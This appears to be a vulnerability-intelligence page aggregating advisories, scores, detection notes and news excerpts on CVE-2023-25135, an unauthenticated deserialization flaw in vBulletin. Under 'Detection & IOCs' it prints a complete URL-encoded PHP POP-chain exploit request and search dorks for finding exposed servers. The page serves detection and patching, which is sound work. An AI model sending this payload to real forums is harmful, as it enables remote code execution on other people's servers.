CVE-2023-25135
published 2023-02-03CVE-2023-25135: vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
23.93%
97.6th percentile
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/ajax/api/user/save
commanduser[searchprefs]=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}
yara↗
strings containing serialized object of type PDOStatement or MonologHandlerSyslogUdpHandler
- →The exploit payload uses serialized Monolog\Handler\SyslogUdpHandler and Monolog\Handler\BufferHandler PHP objects chained together as a POP chain to achieve RCE via the verify_serialized() deserialization flaw.
- →Successful exploitation produces a response body containing 'string(14)' and '"CVE-2023-25135"' with HTTP 200 and Content-Type application/json — use these as detection matchers.
- →GreyNoise tagged active scanning/exploitation attempts for this CVE as 'vBulletin Remote Command Execution CVE-2023-25135 Attempt' — monitor for this tag to identify attacking IPs. ↗
- →Shodan/FOFA/Google dorks can identify exposed vBulletin instances as attack surface: search for http.component:"vBulletin", body="powered by vbulletin", or intext:"Powered By vBulletin".
- →CVE-2023-25135 exploitation attempts were also observed in the wild alongside CVE-2023-6933 WordPress attacks, indicating opportunistic mass scanning. ↗
- ·The deserialization vulnerability exists in the verify_serialized() function, which calls PHP's unserialize() to check if data is serialized — this is the root cause enabling the POP chain exploitation. ↗
- ·Directly deserializing a PDOStatement object does not lead to code execution on its own; a full RCE requires a suitable POP chain (e.g., Monolog handlers) present in the vBulletin framework. ↗
- ·Affected versions are vBulletin 5.6.0 through 5.6.8; fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r8jw-f89q-p7g6: vBulletin before 5
ghsa_unreviewed·2023-02-03
CVE-2023-25135 [CRITICAL] CWE-502 GHSA-r8jw-f89q-p7g6: vBulletin before 5
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
VulnCheck
vBulletin vBulletin Deserialization of Untrusted Data
vulncheck·2023·CVSS 9.8
CVE-2023-25135 [CRITICAL] vBulletin vBulletin Deserialization of Untrusted Data
vBulletin vBulletin Deserialization of Untrusted Data
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-25135; https://dashboard.shadowserver.org/statistics/honeypot/vulne
No detection rules found.
Nuclei
vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
nuclei·CVSS 9.8
CVE-2023-25135 [CRITICAL] vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
Template:
id: CVE-2023-25135
info:
name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
i
Bleepingcomputer
Hackers target WordPress database plugin active on 1 million sites
blogs_bleepingcomputer·2024-01-25·CVSS 9.8
[CRITICAL] Hackers target WordPress database plugin active on 1 million sites
## Hackers target WordPress database plugin active on 1 million sites
## Bill Toulas
Malicious activity targeting a critical severity flaw in the ‘Better Search Replace’ WordPress plugin has been detected, with researchers observing thousands of attempts in the past 24 hours.
Better Search Replace is a WordPress plugin with more than one million installations that helps with search and replace operations in databases when moving websites to new domains or servers.
Admins can use it to search and replace specific text in the database or handle serialized data, and it provides selective replacement options, support for WordPress Multisite, and also includes a “dry run” option to make sure that everything works fine.
The plugin vendor, WP Engine, released version 1.4.5 last week to addre
Sentinelone
CVE-2023-25135: vBulletin Remote Code Execution Vulnerability
blogs_sentinelone·2023-05-16·CVSS 9.8
CVE-2023-25135 [CRITICAL] CVE-2023-25135: vBulletin Remote Code Execution Vulnerability
vBulletin, a popular software for building dynamic online communities and forums, has been discovered to house a severe security vulnerability. This critical flaw, CVE-2023-25135, affects vBulletin versions 5.6.0 through 5.6.8. The potential security risk is immense, given its broad usage across numerous online forums.
The severity of CVE-2023-25135 considered as Critical, as it allows a remote attacker to execute arbitrary code on a vulnerable system. On March 8, 2023, vBulletin acknowledged this vulnerability and swiftly issued security updates to mitigate it. Exploiting this Remote Code Execution (RCE) vulnerability occurs when a specifically crafted request dispatched to the vBulletin server, escalating the potential damage to the compromised system.
The risk associated with CVE-2023
Sentinelone
CVE-2023-25135: vBulletin Remote Code Execution Vulnerability
blogs_sentinelone·2023-05-16·CVSS 9.8
CVE-2023-25135 [CRITICAL] CVE-2023-25135: vBulletin Remote Code Execution Vulnerability
vBulletin, a popular software for building dynamic online communities and forums, has been discovered to house a severe security vulnerability. This critical flaw, CVE-2023-25135, affects vBulletin versions 5.6.0 through 5.6.8. The potential security risk is immense, given its broad usage across numerous online forums.
The severity of CVE-2023-25135 considered as Critical, as it allows a remote attacker to execute arbitrary code on a vulnerable system. On March 8, 2023, vBulletin acknowledged this vulnerability and swiftly issued security updates to mitigate it. Exploiting this Remote Code Execution (RCE) vulnerability occurs when a specifically crafted request dispatched to the vBulletin server, escalating the potential damage to the compromised system.
The risk associated with CVE-2023
Sentinelone
PaperCut Vulnerability: Unpatched Servers Exploited in the Wild
blogs_sentinelone·2023-05-04·CVSS 9.8
CVE-2023-27350 [CRITICAL] PaperCut Vulnerability: Unpatched Servers Exploited in the Wild
On March 8, 2023, PaperCut fixed two new vulnerabilities, CVE-2023-27350 and CVE-2023-27351. These problems could have allowed an attacker to take control of the PaperCut server from a remote location.
CVE-2023-27350 is a vulnerability that allows remote attackers to bypass authentication on affected installations of PaperCut NG version 8.0 or later on all OS platforms. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control.
This critical-rated vulnerability carries a severity score of 9.8 out of 10, indicating its high potential for damage if exploited.
Another vulnerability in PaperCut, CVE-2023-27351, could allow unauthorized attackers to access and extract sensitive user a
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patchhttps://www.ambionics.io/blog/vbulletin-unserializable-but-unreachablehttps://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patchhttps://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
2023-02-03
Published
Exploited in the wild